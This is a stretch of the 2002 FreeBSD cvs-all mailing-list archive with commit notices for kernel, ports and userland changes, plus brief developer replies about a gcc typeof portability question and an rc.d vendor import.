cvs-all@FreeBSD.org Subject: cvs commit: ports/math/atlas Makefile distinfo pkg-descr pkg-plist ports/math/atlas/files answer blas.h lapack.h patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG yoichi 2002/06/22 00:54:16 PDT Modified files: math/atlas Makefile distinfo pkg-descr pkg-plist math/atlas/files patch-aa Added files: math/atlas/files answer blas.h lapack.h Log: Update to 3.4.1. (Use patch posted to ports-jp@ list) PR: 37663 Submitted by: maintainer Revision Changes Path 1.3 +27 -16 ports/math/atlas/Makefile 1.2 +1 -1 ports/math/atlas/distinfo 1.3 +10 -0 ports/math/atlas/files/answer (new) 1.1 +857 -0 ports/math/atlas/files/blas.h (new) 1.1 +5085 -0 ports/math/atlas/files/lapack.h (new) 1.3 +11 -11 ports/math/atlas/files/patch-aa 1.2 +5 -3 ports/math/atlas/pkg-descr 1.3 +16 -2 ports/math/atlas/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 0:54:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DB69B37B43C; Sat, 22 Jun 2002 00:54:42 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M7sgP81963; Sat, 22 Jun 2002 00:54:42 -0700 (PDT) (envelope-from alc) Message-Id: <200206220754.g5M7sgP81963@freefall.freebsd.org> From: Alan Cox Date: Sat, 22 Jun 2002 00:54:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm phys_pager.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/22 00:54:42 PDT Modified files: sys/vm phys_pager.c Log: o Remove GIANT_REQUIRED from phys_pager_alloc(). If handle isn't NULL, acquire and release Giant. If handle is NULL, Giant isn't needed. o Annotate phys_pager_alloc() and phys_pager_dealloc() as MPSAFE. Revision Changes Path 1.13 +8 -3 src/sys/vm/phys_pager.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 1: 0:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0564837B429; Sat, 22 Jun 2002 01:00:12 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M80Cv82500; Sat, 22 Jun 2002 01:00:12 -0700 (PDT) (envelope-from tjr) Message-Id: <200206220800.g5M80Cv82500@freefall.freebsd.org> From: "Tim J. Robbins" Date: Sat, 22 Jun 2002 01:00:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/mv mv.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/22 01:00:12 PDT Modified files: (Branch: RELENG_4) bin/mv mv.c Log: MFC: Revision 1.38: When trying to emulate a cross-device move operation with cp and rm, add a "--" argument after the options so filenames with leading dashes are handled correctly. Revision Changes Path 1.24.2.4 +3 -3 src/bin/mv/mv.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 1: 3:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AFDB137B41A; Sat, 22 Jun 2002 01:03:21 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M83LS83027; Sat, 22 Jun 2002 01:03:21 -0700 (PDT) (envelope-from alc) Message-Id: <200206220803.g5M83LS83027@freefall.freebsd.org> From: Alan Cox Date: Sat, 22 Jun 2002 01:03:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm swap_pager.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/22 01:03:21 PDT Modified files: sys/vm swap_pager.c Log: o Replace GIANT_REQUIRED in swap_pager_alloc() by the acquisition and release of Giant. (Annotate as MPSAFE.) Revision Changes Path 1.173 +4 -3 src/sys/vm/swap_pager.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 1: 8:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BFBD437B405; Sat, 22 Jun 2002 01:08:51 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M88pl87311; Sat, 22 Jun 2002 01:08:51 -0700 (PDT) (envelope-from obrien) Message-Id: <200206220808.g5M88pl87311@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 01:08:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/binutils/doc Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 01:08:51 PDT Modified files: gnu/usr.bin/binutils/doc Makefile Log: Grre-^#$(*+#@$!@% I hate .info files, I really do (thus I have NO_INFO set...) Don't try to read files from a non-existant gdb.291/. Revision Changes Path 1.9 +2 -2 src/gnu/usr.bin/binutils/doc/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 1:58:19 2002 Delivered-To: cvs-all@freebsd.org Received: from overcee.wemm.org (12-232-114-102.client.attbi.com [12.232.114.102]) by hub.freebsd.org (Postfix) with ESMTP id 0811337B444; Sat, 22 Jun 2002 01:56:53 -0700 (PDT) Received: from wemm.org (localhost [127.0.0.1]) by overcee.wemm.org (Postfix) with ESMTP id 31108380E; Sat, 22 Jun 2002 01:56:56 -0700 (PDT) (envelope-from peter@wemm.org) X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: Doug Barton Cc: "David E. O'Brien" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, gordon@FreeBSD.org, Mike Makonnen Subject: Re: cvs commit: src/etc/rc.d - Imported sources In-Reply-To: <3D13E5C4.504DE4D9@FreeBSD.org> Date: Sat, 22 Jun 2002 01:56:56 -0700 From: Peter Wemm Message-Id: <20020622085656.31108380E@overcee.wemm.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Doug Barton wrote: > "David E. O'Brien" wrote: > > > > obrien 2002/06/21 12:07:21 PDT > > > > src/etc/rc.d - Imported sources > > Update of /home/ncvs/src/etc/rc.d > > In directory freefall.freebsd.org:/c/tmp/cvs-serv42453 > > > > Log Message: > > Sync with NetBSD's mainline. > > Ummm.... two questions. Did you coordinate this change (and the import > of sbin/rcorder) with Mike or Gordon? Second, what do you plan to do > with the conflicts? We're actively working on this stuff now, so I'm not > sure that this import is a Good Thing, but maybe I missed something... There are no conflicts. He just imported the baseline from netbsd onto the vendor branch. This import changes nothing. > > 72 conflicts created by this import. > > Use the following command to help the merge: > > > > cvs checkout -jNETBSD:yesterday -jNETBSD src/etc/rc.d > > > > -- > "We have known freedom's price. We have shown freedom's power. > And in this great conflict, ... we will see freedom's victory." > - George W. Bush, President of the United States > State of the Union, January 28, 2002 > > Do YOU Yahoo!? > Cheers, -Peter -- Peter Wemm - peter@wemm.org; peter@FreeBSD.org; peter@yahoo-inc.com "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3: 5:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 841E737B404; Sat, 22 Jun 2002 03:05:51 -0700 (PDT) Received: (from mini@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MA5pO06246; Sat, 22 Jun 2002 03:05:51 -0700 (PDT) (envelope-from mini) Message-Id: <200206221005.g5MA5pO06246@freefall.freebsd.org> From: Jonathan Mini Date: Sat, 22 Jun 2002 03:05:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern kern_proc.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mini 2002/06/22 03:05:50 PDT Modified files: sys/kern kern_proc.c Log: Always drop the p_args reference we held for copyout, even if we're about to change it. This fixes a leak triggered by setproctitle(3). Approved by: alfred Noticed by: Peter Jeremy Revision Changes Path 1.137 +2 -3 src/sys/kern/kern_proc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:21:40 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 8964337B409; Sat, 22 Jun 2002 03:21:33 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id UAA00459; Sat, 22 Jun 2002 20:21:31 +1000 Date: Sat, 22 Jun 2002 20:26:30 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: "David E. O'Brien" Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/gnu/usr.bin/binutils/gdb Makefile In-Reply-To: <200206211905.g5LJ5Ke39248@freefall.freebsd.org> Message-ID: <20020622201241.K7645-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, 21 Jun 2002, David E. O'Brien wrote: > obrien 2002/06/21 12:05:20 PDT > > Modified files: > gnu/usr.bin/binutils/gdb Makefile > Log: > We need to link with libiberty.a before libreadline.so. Both supply > xmalloc() and xrealloc() and the mixed usage of xmalloc in some .c's from > libiberty.a and other .c's from libreadline.so produces an unusable binary > on the Alpha. Not to mention that it results in a nonexistent binary on i386's when the error of mixing x*alloc()s is detected by linking statically. This has been breaking worlds for about 5 months. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:29:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 84AA937B400; Sat, 22 Jun 2002 03:29:20 -0700 (PDT) Received: (from skv@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MATK508384; Sat, 22 Jun 2002 03:29:20 -0700 (PDT) (envelope-from skv) Message-Id: <200206221029.g5MATK508384@freefall.freebsd.org> From: Sergey Skvortsov Date: Sat, 22 Jun 2002 03:29:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/p5-Class-Loader Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG skv 2002/06/22 03:29:20 PDT Modified files: devel/p5-Class-Loader Makefile distinfo pkg-descr Log: Updated to 2.02 Revision Changes Path 1.2 +2 -2 ports/devel/p5-Class-Loader/Makefile 1.2 +1 -1 ports/devel/p5-Class-Loader/distinfo 1.2 +11 -5 ports/devel/p5-Class-Loader/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:33:47 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id A194437B400; Sat, 22 Jun 2002 03:33:42 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id UAA01122; Sat, 22 Jun 2002 20:33:39 +1000 Date: Sat, 22 Jun 2002 20:38:38 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Juli Mallett Cc: Doug Barton , , Subject: Re: cvs commit: src/usr.sbin/inetd inetd.c In-Reply-To: <20020621195650.A29348@FreeBSD.ORG> Message-ID: <20020622202821.P7645-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, 21 Jun 2002, Juli Mallett wrote: > * Doug Barton escriur=E9res > > Bruce Evans wrote: > > > > > > On Fri, 21 Jun 2002, Juli Mallett wrote: > > > > Use __typeof__ instead of typeof. > > > > > > Both of these are gcc features. I prefer typeof since it doesn't giv= e > > > undefined behaviour for non-gcc compilers. > > > > As far as I recall, we still have a long-term project goal of making > > sources that don't depend on gcc to compile, so I'd agree with Bruce > > that this is a bad change. > > I seem to recall using at least one compiler that knew __typeof__ but not > typeof, not to mention that GCC seems to be ignorant that typeof() is a > builtin, but not __typeof__(), and therefore will emit bogus warnings. I think gcc emits non-bogus warnings about typeof() because you asked it to by setting WARNS to >=3D 5 to make gcc more standard. typeof() is just a function call in Standard C, so typeof(a) cannot possibly be part of a declaration like it needs to be in the SWAP() macro. Portable code would use __typeof__() inside a __GNUC__ ifdef for the gcc case and something else for the non-gcc case, or just something else in all cases. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:34:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 139C037B404; Sat, 22 Jun 2002 03:34:09 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MAY9x09130; Sat, 22 Jun 2002 03:34:09 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206221034.g5MAY9x09130@freefall.freebsd.org> From: Juli Mallett Date: Sat, 22 Jun 2002 03:34:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd inetd.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/22 03:34:08 PDT Modified files: usr.sbin/inetd inetd.c Log: Unused macro. Revision Changes Path 1.103 +0 -1 src/usr.sbin/inetd/inetd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:34:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9FE4D37B409; Sat, 22 Jun 2002 03:34:09 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MAY9W09143; Sat, 22 Jun 2002 03:34:09 -0700 (PDT) (envelope-from blackend) Message-Id: <200206221034.g5MAY9W09143@freefall.freebsd.org> From: Marc Fonvieille Date: Sat, 22 Jun 2002 03:34:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/it_IT.ISO8859-15/articles/filtering-bridges article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/22 03:34:09 PDT Modified files: it_IT.ISO8859-15/articles/filtering-bridges article.sgml Log: MFen --> 1.11 PR: docs/39510 Approved by: keramida Revision Changes Path 1.4 +17 -17 doc/it_IT.ISO8859-15/articles/filtering-bridges/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:37:27 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id DEC5937B403; Sat, 22 Jun 2002 03:37:23 -0700 (PDT) Date: Sat, 22 Jun 2002 03:37:23 -0700 From: Juli Mallett To: Bruce Evans Cc: Doug Barton , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: src/usr.sbin/inetd inetd.c Message-ID: <20020622033723.A12949@FreeBSD.ORG> References: <20020621195650.A29348@FreeBSD.ORG> <20020622202821.P7645-100000@gamplex.bde.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020622202821.P7645-100000@gamplex.bde.org>; from bde@zeta.org.au on Sat, Jun 22, 2002 at 08:38:38PM +1000 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Bruce Evans escriuréres > > I seem to recall using at least one compiler that knew __typeof__ but not > > typeof, not to mention that GCC seems to be ignorant that typeof() is a > > builtin, but not __typeof__(), and therefore will emit bogus warnings. > > I think gcc emits non-bogus warnings about typeof() because you asked it to > by setting WARNS to >= 5 to make gcc more standard. typeof() is just a > function call in Standard C, so typeof(a) cannot possibly be part of a Right, I realised this, but did't explain it right. It has to treat it like any function. > declaration like it needs to be in the SWAP() macro. Portable code would > use __typeof__() inside a __GNUC__ ifdef for the gcc case and something > else for the non-gcc case, or just something else in all cases. Easy enough to do the latter. Thanks. -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:39:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4065037B405; Sat, 22 Jun 2002 03:39:21 -0700 (PDT) Received: (from skv@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MAdLF09396; Sat, 22 Jun 2002 03:39:21 -0700 (PDT) (envelope-from skv) Message-Id: <200206221039.g5MAdLF09396@freefall.freebsd.org> From: Sergey Skvortsov Date: Sat, 22 Jun 2002 03:39:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/p5-Finance-Quote Makefile distinfo output pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG skv 2002/06/22 03:39:21 PDT Modified files: misc/p5-Finance-Quote Makefile distinfo pkg-comment pkg-descr pkg-plist Removed files: misc/p5-Finance-Quote output Log: Updated to 1.07 Revision Changes Path 1.5 +11 -18 ports/misc/p5-Finance-Quote/Makefile 1.4 +1 -1 ports/misc/p5-Finance-Quote/distinfo 1.2 +0 -6 ports/misc/p5-Finance-Quote/output (dead) 1.2 +1 -1 ports/misc/p5-Finance-Quote/pkg-comment 1.2 +10 -1 ports/misc/p5-Finance-Quote/pkg-descr 1.3 +5 -4 ports/misc/p5-Finance-Quote/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 3:50: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A64F37B400; Sat, 22 Jun 2002 03:50:02 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MAimk10260; Sat, 22 Jun 2002 03:44:48 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206221044.g5MAimk10260@freefall.freebsd.org> From: Juli Mallett Date: Sat, 22 Jun 2002 03:44:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/inetd inetd.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/22 03:44:47 PDT Modified files: usr.sbin/inetd inetd.c Log: Replace the SWAP(var0,var1) macro with SWAP(type,var0,var1) and use it as is appropriate to avoid using typeof/__typeof__. It is worth noting that SWAP() is only ever used to swap pointer values so 'void *' assumptions would have been acceptable, but I'd gladly pay you tuesday for a cheeseburger^W cleaner interface today. Poked into submission by: bde Revision Changes Path 1.104 +9 -9 src/usr.sbin/inetd/inetd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 4:12:51 2002 Delivered-To: cvs-all@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id C4F7337B400; Sat, 22 Jun 2002 04:12:48 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1920) id A0D65AE163; Sat, 22 Jun 2002 04:12:48 -0700 (PDT) Date: Sat, 22 Jun 2002 04:12:48 -0700 From: Maxime Henrion To: cvs-all@FreeBSD.org, cvs-committers@FreeBSD.org Cc: Jeffrey Hsu Subject: Re: cvs commit: src/sys/netinet udp_usrreq.c Message-ID: <20020622111248.GB85244@elvis.mu.org> References: <200206212254.g5LMsHN43745@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206212254.g5LMsHN43745@freefall.freebsd.org> User-Agent: Mutt/1.3.27i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Jeffrey Hsu wrote: > hsu 2002/06/21 15:54:17 PDT > > Modified files: > sys/netinet udp_usrreq.c > Log: > Fix logic which resulted in missing a call to INP_UNLOCK(). Thanks! Maxime To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 4:29:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9DB9E37B400; Sat, 22 Jun 2002 04:29:08 -0700 (PDT) Received: (from luigi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MBT8T21662; Sat, 22 Jun 2002 04:29:08 -0700 (PDT) (envelope-from luigi) Message-Id: <200206221129.g5MBT8T21662@freefall.freebsd.org> From: Luigi Rizzo Date: Sat, 22 Jun 2002 04:29:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys mbuf.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG luigi 2002/06/22 04:29:08 PDT Modified files: sys/sys mbuf.h Log: Define an mbuf type, MT_TAG, used for volatile annotations prepended to mbuf chains in the network stack. Reuse a previoulsy unused value to avoid changes in other data structures. Revision Changes Path 1.92 +3 -2 src/sys/sys/mbuf.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 4:51:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E15E237B403; Sat, 22 Jun 2002 04:51:03 -0700 (PDT) Received: (from luigi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MBp3x23846; Sat, 22 Jun 2002 04:51:03 -0700 (PDT) (envelope-from luigi) Message-Id: <200206221151.g5MBp3x23846@freefall.freebsd.org> From: Luigi Rizzo Date: Sat, 22 Jun 2002 04:51:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/net bridge.c if_ethersubr.c src/sys/netinet ip_divert.c ip_dummynet.c ip_dummynet.h ip_fw.c ip_fw.h ip_input.c ip_output.c ip_var.h tcp_input.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG luigi 2002/06/22 04:51:03 PDT Modified files: sys/net bridge.c if_ethersubr.c sys/netinet ip_divert.c ip_dummynet.c ip_dummynet.h ip_fw.c ip_fw.h ip_input.c ip_output.c ip_var.h tcp_input.c Log: Remove (almost all) global variables that were used to hold packet forwarding state ("annotations") during ip processing. The code is considerably cleaner now. The variables removed by this change are: ip_divert_cookie used by divert sockets ip_fw_fwd_addr used for transparent ip redirection last_pkt used by dynamic pipes in dummynet Removal of the first two has been done by carrying the annotations into volatile structs prepended to the mbuf chains, and adding appropriate code to add/remove annotations in the routines which make use of them, i.e. ip_input(), ip_output(), tcp_input(), bdg_forward(), ether_demux(), ether_output_frame(), div_output(). On passing, remove a bug in divert handling of fragmented packet. Now it is the fragment at offset 0 which sets the divert status of the whole packet, whereas formerly it was the last incoming fragment to decide. Removal of last_pkt required a change in the interface of ip_fw_chk() and dummynet_io(). On passing, use the same mechanism for dummynet annotations and for divert/forward annotations. option IPFIREWALL_FORWARD is effectively useless, the code to implement it is very small and is now in by default to avoid the obfuscation of conditionally compiled code. NOTES: * there is at least one global variable left, sro_fwd, in ip_output(). I am not sure if/how this can be removed. * I have deliberately avoided gratuitous style changes in this commit to avoid cluttering the diffs. Minor stule cleanup will likely be necessary * this commit only focused on the IP layer. I am sure there is a number of global variables used in the TCP and maybe UDP stack. * despite the number of files touched, there are absolutely no API's or data structures changed by this commit (except the interfaces of ip_fw_chk() and dummynet_io(), which are internal anyways), so an MFC is quite safe and unintrusive (and desirable, given the improved readability of the code). MFC after: 10 days Revision Changes Path 1.50 +52 -35 src/sys/net/bridge.c 1.112 +38 -29 src/sys/net/if_ethersubr.c 1.65 +66 -67 src/sys/netinet/ip_divert.c 1.47 +39 -44 src/sys/netinet/ip_dummynet.c 1.20 +18 -22 src/sys/netinet/ip_dummynet.h 1.188 +42 -38 src/sys/netinet/ip_fw.c 1.68 +22 -3 src/sys/netinet/ip_fw.h 1.201 +101 -123 src/sys/netinet/ip_input.c 1.158 +124 -92 src/sys/netinet/ip_output.c 1.61 +1 -2 src/sys/netinet/ip_var.h 1.161 +14 -9 src/sys/netinet/tcp_input.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 5:32: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 45CCD37B423; Sat, 22 Jun 2002 05:31:23 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MCVJV34186; Sat, 22 Jun 2002 05:31:19 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206221231.g5MCVJV34186@freefall.freebsd.org> From: Dirk Meyer Date: Sat, 22 Jun 2002 05:31:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, 